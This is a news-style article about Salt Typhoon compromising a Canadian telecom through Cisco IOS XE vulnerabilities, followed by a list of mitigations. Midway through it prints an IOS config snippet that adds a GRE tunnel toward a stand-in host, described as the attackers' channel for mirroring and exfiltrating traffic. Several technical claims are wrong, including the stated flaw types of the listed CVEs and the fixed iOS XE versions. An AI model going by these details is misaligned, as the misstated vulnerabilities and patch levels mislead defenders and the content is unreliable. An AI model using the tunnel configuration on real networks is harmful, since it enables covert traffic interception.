Chinese Hackers Target Canadian Telecom via Cisco iOS XE Flaws

In mid-February 2025, a major Canadian telecommunications provider fell victim to a sophisticated intrusion by a group known as Salt Typhoon, widely believed to operate on behalf of the People’s Republic of China. The attackers exploited CVE-2023-20198, a critical Cisco iOS XE vulnerability that Cisco had patched in October 2023. Despite the availability of fixes for over 16 months, the victim had not applied the update, enabling remote code execution and subsequent network reconnaissance.

Threat Overview

Canada’s Cyber Centre and the U.S. Federal Bureau of Investigation (FBI) issued near-identical advisories warning that PRC state-sponsored actors continue to target telecommunications infrastructure globally. Salt Typhoon has previously breached multiple U.S. carriers, including Verizon and AT&T, using similar tactics to intercept wiretaps and exfiltrate subscriber and network metadata.

Technical Details of the Exploits

Vulnerability Specifications

• CVE-2023-20198 (CVSS 10.0): HTTP(S) server buffer overflow in Cisco iOS XE earlier than 17.6.2 allows unauthenticated remote code execution on switches, routers, and wireless LAN controllers.
• CVE-2018-0171 (CVSS 9.8): Recursive deserialization flaw in Smart Install feature on IOS and IOS XE devices.
• CVE-2023-20273 (CVSS 9.8): Denial-of-service flaw in UDP packet processing spawned by fragmented packet handling.
• CVE-2024-20399 (CVSS 9.1): Path-traversal in HTTP client module affecting SSL/TLS validation logic.

Salt Typhoon chained these flaws to establish persistence, escalate privileges, and move laterally. Once initial access was gained via CVE-2023-20198, they extracted critical configuration data by issuing show running-config commands over the HTTP server interface.

Attack Chain and Network Manipulation

1. Exploit buffer overflow to spawn a root shell.
2. Retrieve running configuration files containing SNMP community strings, NTP servers, and access-control lists.
3. Inject a Generic Routing Encapsulation (GRE) tunnel entry into running-config by modifying the file:
   

   interface Tunnel500
   tunnel source GigabitEthernet1/0/1
   tunnel destination 203.0.113.45
   tunnel mode gre ip

4. Use the GRE tunnel to mirror network traffic and exfiltrate data to a command-and-control node.
5. Cover tracks by deleting logs and restoring benign configuration snapshots.

Incident Timeline and Broader Impact

• October 2023: Cisco publishes fixes for CVE-2023-20198 following VulnCheck’s public disclosure.
• February 2024: Salt Typhoon compromises multiple U.S. telecoms, accesses lawful intercept platforms.
• November 2024: Cisco patches CVE-2024-20399 amid ongoing investigations.
• Mid-February 2025: Canadian provider’s three network devices are subverted via the unpatched CVE-2023-20198.
• June 2025: Canada’s Cyber Centre and FBI jointly alert the public, urging immediate mitigation.

The prolonged window between patch release and exploitation highlights a systemic failure in patch management and risk prioritization among telecom operators. Running outdated firmware not only violates best practices but also undermines downstream services that rely on secure infrastructure.

Expert Perspectives

“Telecommunications networks form the backbone of critical communications. When adversaries like Salt Typhoon gain silent access, they can intercept voice calls, SMS metadata, and even 5G control-plane messages,” says Dr. Elena Reshetova, Senior Analyst at Mandiant Intelligence. “Mitigations must include both rigorous patching and continuous monitoring of device configurations.”

“Organizations often treat network gear as a ‘set-and-forget’ element. That complacency is exactly what advanced persistent threats exploit,” – Brett Callow, Threat Analyst at Emsisoft.

In-Depth Technical Analysis

This section examines how Salt Typhoon optimized low-level exploits to operate within tight resource constraints on embedded systems. By leveraging return-oriented programming (ROP) chains against the HTTP parser, they achieved high reliability in memory corruption without triggering Cisco’s internal safeguards. The group employed custom backdoors disguised as routine TLS sessions to evade deep packet inspection.

Patch Management and Best Practices

Telecom operators must adopt a proactive patch cadence, especially for devices exposed to the Internet. Recommended actions include:

• Automated vulnerability scanning with CVE feed integrations.
• Zero-touch provisioning that enforces minimum firmware versions.
• Network Access Control (NAC) solutions like Cisco ISE to quarantine non-compliant devices.
• Regular backups of running-config and startup-config to immutable storage.

Global Trends in State-Sponsored Telecom Hacks

APT groups linked to nation-states have intensified their focus on telecommunications in 2025, exploiting gaps in 5G core networks and virtualization platforms. Recent alerts from U.S. CISA and the EU’s ENISA warn of similar campaigns by Russia-aligned groups targeting VoLTE architectures.

Strategic Implications and Future Outlook

Given the strategic importance of telecom infrastructure—supporting emergency services, banking, and national security—the risk extends far beyond commercial loss. Canada’s Cyber Centre predicts continued targeting over the next two years, urging providers to harden both hardware and virtualized network functions (VNFs) against emerging zero-days.

Mitigation Recommendations

1. Immediately upgrade all Cisco devices to the latest iOS XE releases (17.7.1 or newer).
2. Disable unused services (e.g., ip http server, ip http secure-server).
3. Implement strict ACLs limiting management interfaces to known administrative subnets.
4. Deploy network segmentation and microsegmentation to reduce lateral movement.
5. Use Security Orchestration, Automation, and Response (SOAR) tools to accelerate incident response.